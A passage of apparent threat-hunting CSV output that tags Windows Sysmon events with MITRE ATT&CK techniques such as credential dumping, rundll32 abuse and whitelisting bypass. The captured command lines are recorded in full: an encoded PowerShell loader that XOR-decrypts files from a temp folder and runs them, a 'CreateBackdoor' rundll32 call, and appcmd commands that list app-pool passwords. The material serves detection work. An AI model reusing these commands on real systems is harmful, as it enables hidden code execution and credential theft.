CAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766825.425419,2020-03-21T09:00:25.425419+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243552 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.397 + 747F3D96-9F69-5E75-0000-001033922000 + 6572 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1003 ] Credential Dumping ImageLoad,1555606894.689291,2019-04-18T21:01:34.689291+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 27 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 17:01:34.629 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\hid.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Hid User Library + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606894.689291,2019-04-18T21:01:34.689291+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 27 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 17:01:34.629 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\hid.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Hid User Library + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920557.581146,2019-05-27T05:29:17.581146+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5892 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:17.420 + 365ABB72-3D6D-5CEB-0000-0010576BFF00 + 2928 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1584794166.990686,2020-03-21T16:36:06.990686+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 244341 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 12:36:03.899 + 747F3D96-0A33-5E76-0000-0010B8813D00 + 3696 + C:\Windows\System32\whoami.exe + 10.0.17763.1 (WinBuild.160101.0800) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami.exe + whoami + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-069C-5E76-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 + 747F3D96-08DA-5E76-0000-001054382E00 + 2632 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task manipulation ,1558843303.567204,2019-05-26T08:01:43.567204+04:00,,Threat,Medium,"Found User (NT AUTHORITY\SYSTEM) Trying to run taskeng.exe or svchost.exe with Command Line (C:\Windows\system32\svchost.exe) and Parent Image :C:\Users\IEUser\Desktop\info.rar\jjs.exe , Parent CommandLine ("C:\Users\IEUser\Desktop\info.rar\jjs.exe") in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4863 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-26 04:01:43.557 + 365ABB72-0FA7-5CEA-0000-001064C60A00 + 3908 + C:\Windows\System32\svchost.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Host Process for Windows Services + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\svchost.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-8DBD-5CEA-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=4AF001B3C3816B860660CF2DE2C0FD3C1DFB4878,MD5=54A47F6B5E09A77E61649109C6A08866,SHA256=121118A0F5E0E8C933EFD28C9901E54E42792619A8A3A6D11E1F0025A7324BC2,IMPHASH=58E185299ECCA757FE68BA83A6495FDE + 365ABB72-0FA6-5CEA-0000-0010FEC30A00 + 3884 + C:\Users\IEUser\Desktop\info.rar\jjs.exe + "C:\Users\IEUser\Desktop\info.rar\jjs.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1558843303.567204,2019-05-26T08:01:43.567204+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4863 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-26 04:01:43.557 + 365ABB72-0FA7-5CEA-0000-001064C60A00 + 3908 + C:\Windows\System32\svchost.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Host Process for Windows Services + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\svchost.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-8DBD-5CEA-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=4AF001B3C3816B860660CF2DE2C0FD3C1DFB4878,MD5=54A47F6B5E09A77E61649109C6A08866,SHA256=121118A0F5E0E8C933EFD28C9901E54E42792619A8A3A6D11E1F0025A7324BC2,IMPHASH=58E185299ECCA757FE68BA83A6495FDE + 365ABB72-0FA6-5CEA-0000-0010FEC30A00 + 3884 + C:\Users\IEUser\Desktop\info.rar\jjs.exe + "C:\Users\IEUser\Desktop\info.rar\jjs.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1003 ] Credential Dumping ImageLoad,1555606894.659248,2019-04-18T21:01:34.659248+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 26 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 17:01:34.418 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\samlib.dll + 6.1.7601.23677 (win7sp1_ldr.170209-0600) + SAM Library DLL + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606894.659248,2019-04-18T21:01:34.659248+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 26 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 17:01:34.418 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\samlib.dll + 6.1.7601.23677 (win7sp1_ldr.170209-0600) + SAM Library DLL + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.401237,2020-03-21T09:00:25.401237+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243550 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.388 + 747F3D96-9F69-5E75-0000-001055912000 + 8160 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920557.350815,2019-05-27T05:29:17.350815+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5889 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:17.310 + 365ABB72-3D6D-5CEB-0000-00109767FF00 + 3096 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.401237,2020-03-21T09:00:25.401237+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243550 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.388 + 747F3D96-9F69-5E75-0000-001055912000 + 8160 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1584827104.923222,2020-03-22T01:45:04.923222+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 244866 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 21:45:04.909 + 747F3D96-8AE0-5E76-0000-0010933B8003 + 7708 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "C:\windows\system32\cmd.exe" + c:\Users\Public\ + MSEDGEWIN10\IEUser + 747F3D96-06A4-5E76-0000-002087DE0200 + 0x2de87 + 1 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-06AA-5E76-0000-001046E10400 + 4668 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1557770610.556085,2019-05-13T22:03:30.556085+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.128.133 ) and port ( 443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 17289 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-13 18:03:20.485 + 365ABB72-B167-5CD9-0000-001062160C00 + 2476 + C:\Windows\System32\regsvr32.exe + IEWIN7\IEUser + tcp + true + false + 10.0.2.15 + IEWIN7 + 49159 + + false + 151.101.128.133 + + 443 + https + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766825.401237,2020-03-21T09:00:25.401237+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243550 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.388 + 747F3D96-9F69-5E75-0000-001055912000 + 8160 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + 